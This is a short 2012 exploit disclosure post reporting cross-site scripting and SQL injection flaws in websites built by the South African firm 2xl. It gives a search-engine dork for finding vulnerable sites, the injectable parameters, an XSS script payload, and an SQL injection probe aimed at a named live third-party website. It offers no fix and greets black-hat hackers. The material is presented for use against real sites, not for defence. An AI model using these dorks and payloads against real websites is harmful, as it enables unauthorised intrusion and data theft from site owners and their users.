2xl Cross Site Scripting - SQL Injection

2012-09-23 13:48:53
Posted by: Net.W0lf

################################################################
----------------------------------------------------------------
2xl XSS/SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : 2xl XSS/SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.2xl.co.za ]
# Impact : [ High ]
# E-Mail : [email protected]
# Dork : intext:" Site by 2xl "
################################################################
----------------------------------------------------------------
+-----------------------+
| Cross Site scripting |
| SQL Injection |
+-----------------------+

Expl0!T :
XSS :
[TarGeT]/search.php?p=7
SQL :
[TaRgeT]/view_product.php?p=&id=[SQL]


Dem0:
XSS :
Search This Text : <script>alert(/0/)</script>
To This Page : www.lpcreative.co.za/search.php?p=7
SQL :
wwww.lpcreative.co.za/view_product.php?p=&id='

Greets To :

| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.com |
| And All Iranian Black Hat HackerZ |

===========================================# End #=============================================

Fixes

No fixes

In order to submit a new fix you need to be registered.